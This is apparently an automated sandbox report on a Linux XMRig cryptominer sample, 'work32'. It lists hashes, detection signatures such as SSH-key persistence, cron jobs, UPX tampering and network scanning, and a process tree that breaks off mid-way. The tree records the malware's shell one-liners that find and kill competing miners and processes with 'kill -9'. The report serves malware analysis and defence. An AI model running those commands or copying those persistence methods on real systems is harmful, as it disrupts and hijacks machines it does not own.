Analysis

  • max time kernel
    48s
  • max time network
    51s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    03/12/2024, 23:54

General

  • Target

    work32

  • Size

    4.2MB

  • MD5

    06e1f988471336d788da0fcaa29ed50b

  • SHA1

    2fa461cd8f0614dfb86f845aef47c42910370b00

  • SHA256

    7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e

  • SHA512

    4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180

  • SSDEEP

    98304:Wr3wZHTOxuXKMHQOdgK6a4mR3chE+Agclmvj2iw+w:WbwZDXDHQOdg0Bo6l

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Adds new SSH keys 1 TTPs 2 IoCs

    Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

  • Contacts a large (1879) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Patched UPX-packed file 2 IoCs

    Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 2 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 38 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 56 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/work32
    /tmp/work32
    1⤵
    • Enumerates kernel/hardware configuration
    PID:1596
    • /tmp/work32
      /tmp/work32 -deamon
      2⤵
      • Creates/modifies Cron job
      • Enumerates kernel/hardware configuration
      • Writes file to tmp directory
      PID:1601
      • /usr/bin/sh
        sh -c "ps -ef | grep Circle_MI | grep -v grep | awk '{print \$2}' | xargs kill -9"
        3⤵
          PID:1618
          • /usr/bin/grep
            grep -v grep
            4⤵
              PID:1621
            • /usr/bin/grep
              grep Circle_MI
              4⤵
                PID:1620
              • /usr/bin/awk
                awk "{print \$2}"
                4⤵
                  PID:1622
                • /usr/bin/xargs
                  xargs kill -9
                  4⤵
                    PID:1623
                    • /usr/local/sbin/kill
                      kill -9
                      5⤵
                        PID:1624
                      • /usr/local/bin/kill
                        kill -9
                        5⤵
                          PID:1624
                        • /usr/sbin/kill
                          kill -9
                          5⤵
                            PID:1624
                          • /usr/bin/kill
                            kill -9
                            5⤵
                            • Reads CPU attributes
                            PID:1624
                        • /usr/bin/ps
                          ps -ef
                          4⤵
                          • Reads CPU attributes
                          • Reads runtime system information
                          PID:1619
                      • /usr/bin/sh
                        sh -c "ps -ef | grep kworker34 | grep -v grep | awk '{print \$2}' | xargs kill -9"
                        3⤵
                          PID:1625
                          • /usr/bin/grep
                            grep -v grep
                            4⤵
                              PID:1628
                            • /usr/bin/grep
                              grep kworker34
                              4⤵
                                PID:1627
                              • /usr/bin/awk
                                awk "{print \$2}"
                                4⤵
                                  PID:1629
                                • /usr/bin/xargs
                                  xargs kill -9
                                  4⤵
                                    PID:1630
                                    • /usr/local/sbin/kill
                                      kill -9
                                      5⤵
                                        PID:1631
                                      • /usr/local/bin/kill
                                        kill -9
                                        5⤵
                                          PID:1631
                                        • /usr/sbin/kill
                                          kill -9
                                          5⤵
                                            PID:1631
                                          • /usr/bin/kill
                                            kill -9
                                            5⤵
                                            • Reads CPU attributes
                                            PID:1631
                                        • /usr/bin/ps
                                          ps -ef
                                          4⤵
                                          • Reads CPU attributes
                                          • Reads runtime system information
                                          PID:1626
                                      • /usr/bin/sh
                                        sh -c "ps -ef | grep .daemond | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                        3⤵
                                          PID:1632
                                          • /usr/bin/grep
                                            grep -v grep
                                            4⤵
                                              PID:1635
                                            • /usr/bin/grep
                                              grep .daemond
                                              4⤵
                                                PID:1634
                                              • /usr/bin/ps
                                                ps -ef
                                                4⤵
                                                • Reads CPU attributes
                                                • Reads runtime system information
                                                PID:1633
                                              • /usr/bin/awk
                                                awk "{print \$2}"
                                                4⤵
                                                  PID:1636
                                                • /usr/bin/xargs
                                                  xargs kill -9
                                                  4⤵
                                                    PID:1637
                                                    • /usr/local/sbin/kill
                                                      kill -9
                                                      5⤵
                                                        PID:1638
                                                      • /usr/local/bin/kill
                                                        kill -9
                                                        5⤵
                                                          PID:1638
                                                        • /usr/sbin/kill
                                                          kill -9
                                                          5⤵
                                                            PID:1638
                                                          • /usr/bin/kill
                                                            kill -9
                                                            5⤵
                                                            • Reads CPU attributes
                                                            PID:1638
                                                      • /usr/bin/sh
                                                        sh -c "ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                        3⤵
                                                          PID:1639
                                                          • /usr/bin/xargs
                                                            xargs kill -9
                                                            4⤵
                                                              PID:1644
                                                              • /usr/local/sbin/kill
                                                                kill -9
                                                                5⤵
                                                                  PID:1645
                                                                • /usr/local/bin/kill
                                                                  kill -9
                                                                  5⤵
                                                                    PID:1645
                                                                  • /usr/sbin/kill
                                                                    kill -9
                                                                    5⤵
                                                                      PID:1645
                                                                    • /usr/bin/kill
                                                                      kill -9
                                                                      5⤵
                                                                      • Reads CPU attributes
                                                                      PID:1645
                                                                  • /usr/bin/awk
                                                                    awk "{print \$2}"
                                                                    4⤵
                                                                      PID:1643
                                                                    • /usr/bin/grep
                                                                      grep -v grep
                                                                      4⤵
                                                                        PID:1642
                                                                      • /usr/bin/grep
                                                                        grep /tmp/thisxxs
                                                                        4⤵
                                                                          PID:1641
                                                                        • /usr/bin/ps
                                                                          ps -ef
                                                                          4⤵
                                                                          • Reads CPU attributes
                                                                          • Reads runtime system information
                                                                          PID:1640
                                                                      • /usr/bin/sh
                                                                        sh -c "ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                        3⤵
                                                                          PID:1646
                                                                          • /usr/bin/xargs
                                                                            xargs kill -9
                                                                            4⤵
                                                                              PID:1651
                                                                              • /usr/local/sbin/kill
                                                                                kill -9
                                                                                5⤵
                                                                                  PID:1652
                                                                                • /usr/local/bin/kill
                                                                                  kill -9
                                                                                  5⤵
                                                                                    PID:1652
                                                                                  • /usr/sbin/kill
                                                                                    kill -9
                                                                                    5⤵
                                                                                      PID:1652
                                                                                    • /usr/bin/kill
                                                                                      kill -9
                                                                                      5⤵
                                                                                      • Reads CPU attributes
                                                                                      PID:1652
                                                                                  • /usr/bin/awk
                                                                                    awk "{print \$2}"
                                                                                    4⤵
                                                                                      PID:1650
                                                                                    • /usr/bin/grep
                                                                                      grep -v grep
                                                                                      4⤵
                                                                                        PID:1649
                                                                                      • /usr/bin/grep
                                                                                        grep /opt/yilu/work/xig/xig
                                                                                        4⤵
                                                                                          PID:1648
                                                                                        • /usr/bin/ps
                                                                                          ps -ef
                                                                                          4⤵
                                                                                          • Reads CPU attributes
                                                                                          • Reads runtime system information
                                                                                          PID:1647
                                                                                      • /usr/bin/sh
                                                                                        sh -c "ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                        3⤵
                                                                                          PID:1653
                                                                                          • /usr/bin/xargs
                                                                                            xargs kill -9
                                                                                            4⤵
                                                                                              PID:1658
                                                                                              • /usr/local/sbin/kill
                                                                                                kill -9
                                                                                                5⤵
                                                                                                  PID:1659
                                                                                                • /usr/local/bin/kill
                                                                                                  kill -9
                                                                                                  5⤵
                                                                                                    PID:1659
                                                                                                  • /usr/sbin/kill
                                                                                                    kill -9
                                                                                                    5⤵
                                                                                                      PID:1659
                                                                                                    • /usr/bin/kill
                                                                                                      kill -9
                                                                                                      5⤵
                                                                                                      • Reads CPU attributes
                                                                                                      PID:1659
                                                                                                  • /usr/bin/awk
                                                                                                    awk "{print \$2}"
                                                                                                    4⤵
                                                                                                      PID:1657
                                                                                                    • /usr/bin/grep
                                                                                                      grep -v grep
                                                                                                      4⤵
                                                                                                        PID:1656
                                                                                                      • /usr/bin/grep
                                                                                                        grep /opt/yilu/mservice
                                                                                                        4⤵
                                                                                                          PID:1655
                                                                                                        • /usr/bin/ps
                                                                                                          ps -ef
                                                                                                          4⤵
                                                                                                          • Reads CPU attributes
                                                                                                          • Reads runtime system information
                                                                                                          PID:1654
                                                                                                      • /usr/bin/sh
                                                                                                        sh -c "ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                        3⤵
                                                                                                          PID:1660
                                                                                                          • /usr/bin/grep
                                                                                                            grep -v grep
                                                                                                            4⤵
                                                                                                              PID:1663
                                                                                                            • /usr/bin/awk
                                                                                                              awk "{print \$2}"
                                                                                                              4⤵
                                                                                                                PID:1664
                                                                                                              • /usr/bin/grep
                                                                                                                grep /usr/bin/.sshd
                                                                                                                4⤵
                                                                                                                  PID:1662
                                                                                                                • /usr/bin/xargs
                                                                                                                  xargs kill -9
                                                                                                                  4⤵
                                                                                                                    PID:1665
                                                                                                                    • /usr/local/sbin/kill
                                                                                                                      kill -9
                                                                                                                      5⤵
                                                                                                                        PID:1666
                                                                                                                      • /usr/local/bin/kill
                                                                                                                        kill -9
                                                                                                                        5⤵
                                                                                                                          PID:1666
                                                                                                                        • /usr/sbin/kill
                                                                                                                          kill -9
                                                                                                                          5⤵
                                                                                                                            PID:1666
                                                                                                                          • /usr/bin/kill
                                                                                                                            kill -9
                                                                                                                            5⤵
                                                                                                                            • Reads CPU attributes
                                                                                                                            PID:1666
                                                                                                                        • /usr/bin/ps
                                                                                                                          ps -ef
                                                                                                                          4⤵
                                                                                                                          • Reads CPU attributes
                                                                                                                          • Reads runtime system information
                                                                                                                          PID:1661
                                                                                                                      • /usr/bin/sh
                                                                                                                        sh -c "ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                        3⤵
                                                                                                                          PID:1667
                                                                                                                          • /usr/bin/xargs
                                                                                                                            xargs kill -9
                                                                                                                            4⤵
                                                                                                                              PID:1672
                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                kill -9
                                                                                                                                5⤵
                                                                                                                                  PID:1673
                                                                                                                                • /usr/local/bin/kill
                                                                                                                                  kill -9
                                                                                                                                  5⤵
                                                                                                                                    PID:1673
                                                                                                                                  • /usr/sbin/kill
                                                                                                                                    kill -9
                                                                                                                                    5⤵
                                                                                                                                      PID:1673
                                                                                                                                    • /usr/bin/kill
                                                                                                                                      kill -9
                                                                                                                                      5⤵
                                                                                                                                      • Reads CPU attributes
                                                                                                                                      PID:1673
                                                                                                                                  • /usr/bin/awk
                                                                                                                                    awk "{print \$2}"
                                                                                                                                    4⤵
                                                                                                                                      PID:1671
                                                                                                                                    • /usr/bin/grep
                                                                                                                                      grep -v grep
                                                                                                                                      4⤵
                                                                                                                                        PID:1670
                                                                                                                                      • /usr/bin/grep
                                                                                                                                        grep /usr/bin/bsd-port/getty
                                                                                                                                        4⤵
                                                                                                                                          PID:1669
                                                                                                                                        • /usr/bin/ps
                                                                                                                                          ps -ef
                                                                                                                                          4⤵
                                                                                                                                          • Reads CPU attributes
                                                                                                                                          • Reads runtime system information
                                                                                                                                          PID:1668
                                                                                                                                      • /usr/bin/sh
                                                                                                                                        sh -c "ps -ef | grep x86_ | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                        3⤵
                                                                                                                                          PID:1674
                                                                                                                                          • /usr/bin/xargs
                                                                                                                                            xargs kill -9
                                                                                                                                            4⤵
                                                                                                                                              PID:1679
                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                kill -9
                                                                                                                                                5⤵
                                                                                                                                                  PID:1680
                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                  kill -9
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1680
                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                    kill -9
                                                                                                                                                    5⤵
                                                                                                                                                      PID:1680
                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                      kill -9
                                                                                                                                                      5⤵
                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                      PID:1680
                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1678
                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                      grep -v grep
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1677
                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                        grep x86_
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1676
                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                          ps -ef
                                                                                                                                                          4⤵
                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:1675
                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                        sh -c "ps -ef | grep cryptonight | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1681
                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                            xargs kill -9
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1686
                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                kill -9
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1687
                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                  kill -9
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:1687
                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                    kill -9
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1687
                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                      kill -9
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                      PID:1687
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1685
                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                      grep -v grep
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1684
                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                        grep cryptonight
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1683
                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                          ps -ef
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:1682
                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                        sh -c "ps -ef | grep ddg | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1688
                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                            xargs kill -9
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1693
                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                kill -9
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:1694
                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                  kill -9
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:1694
                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                    kill -9
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1694
                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                      kill -9
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                      PID:1694
                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1692
                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1691
                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                        grep ddg
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1690
                                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                                          ps -ef
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                          PID:1689
                                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                                        sh -c "ps -ef | grep prohash | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1695
                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                            xargs kill -9
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1700
                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                kill -9
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1701
                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:1701
                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1701
                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                      PID:1701
                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1699
                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1698
                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                        grep prohash
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1697
                                                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                                                          ps -ef
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                          PID:1696
                                                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                                                        sh -c "ps -ef | grep monero | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1702
                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                            xargs kill -9
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1707
                                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:1708
                                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1706
                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1705
                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                        grep monero
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1704
                                                                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                                                                          ps -ef
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                          PID:1703
                                                                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                                                                        sh -c "ps -ef | grep xmr | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1709
                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                            xargs kill -9
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1714
                                                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:1715
                                                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:1715
                                                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:1715
                                                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                      PID:1715
                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                    awk "{print \$2}"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1713
                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                        grep xmr
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                        PID:1711
                                                                                                                                                                                                                                      • /usr/bin/ps
                                                                                                                                                                                                                                        ps -ef
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                        PID:1710
                                                                                                                                                                                                                                    • /usr/bin/sh
                                                                                                                                                                                                                                      sh -c "ps -ef | grep miner | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1716
                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                          xargs kill -9
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                          PID:1721
                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:1722
                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:1722
                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:1722
                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                  PID:1722
                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1720
                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1719
                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                    grep miner
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1718
                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                      PID:1717
                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                    sh -c "ps -ef | grep pool. | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1723
                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1728
                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:1729
                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:1729
                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:1729
                                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                  PID:1729
                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:1727
                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1726
                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                    grep pool.
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1725
                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                    sh -c "ps -ef | grep tcp: | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:1730
                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1735
                                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:1736
                                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1736
                                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:1736
                                                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                  PID:1736
                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1734
                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1733
                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                    grep tcp:
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                      PID:1731
                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                    sh -c "ps -ef | grep stratum | grep -v grep | awk '{print \$2}' | xargs kill -9"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1737
                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                                        4⤵
